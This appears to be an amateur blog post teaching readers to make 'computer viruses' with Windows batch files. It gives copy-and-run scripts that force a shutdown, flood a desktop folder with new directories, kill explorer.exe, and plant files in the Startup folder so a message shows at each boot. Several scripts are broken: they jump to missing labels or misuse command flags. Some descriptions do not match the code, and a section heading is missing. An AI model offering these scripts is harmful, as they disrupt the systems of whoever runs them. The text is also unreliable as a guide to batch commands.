How to create a computer virus?

Hi guys,

  Creating the computer virus is not so tough has u thought and even not so easy has you are currently thinking now. To create a computer virus all you need is some knowledge on DOS(Disk Operating System) commands. If you are the beginner the no problem click there to download PDF about DOS and coming to the point now u have to open the notepad in your computer and start typing. But before doing this you need to know about some commands working like

   1) echo off

                               This command deals with the commands to run without displaying on screen meaning it will work in background. And the user will not be knowing it's working

2) CD
               This command creates the directory means folder or the space to work


                          Has the name says it will shut down the computer but it needs a proper syntax to work example:- shutdown -s command will shutdowns the computer
                          shutdown -r command will restarts the computer
                          shutdown -s -t 30 command will shutdowns the computer in 30 seconds the -t stands for the time and 30 is time duration



@echo off
goto :A

copy this code and paste it to the notepad and save it in .bat format and run it.

when you run this virus it will always executes the start command present on the task bar


@echo off
shutdown -s -t 30 -c "computer will shutdown in 30sec"

copy this code and paste it to the notepad and save it in .bat format and run it.

when you run this virus it will make your computer to shutdown in 30sec


@echo off
cd "c:\documents and settings\all user\desktop"
md %random%
goto :folder

copy this code and paste it to the notepad and save it in .bat format and run it.

This virus will creates the folder in the name of random in your PC and it's a harmful virus it won't stop and makes your PC full of folder


@echo off
ping localhost -m 5 >nul
goto :A

copy this code and paste it to the notepad and save it in .bat format and run it.

this virus is connected to the internet which makes you to open the web pages like google, yahoo, gamil, etc..,,,


@echo off
taskkill explorer.exe 

copy this code and paste it to the notepad and save it in .bat format and run it.

This virus will kill your explorer which is used to open the files present in your hard disk.


@echo off
cd "C:\documents and settings\all users\start menu\programs\start up"
echo echo this is your computer>%random%.bat
echo echo i love you>>%random%.bat
echo pause>>%random%.bat

copy this code and paste it to the notepad and save it in .bat format and run it.

This virus will pops up with the message every time when you turn on your computer. The text written in the bold font style will be displayed when you turn on the Computer 

AND these are some harmless virus which you can know from me. Enjoy, Learn & Share.

stay updated to know more from me.. ;-)



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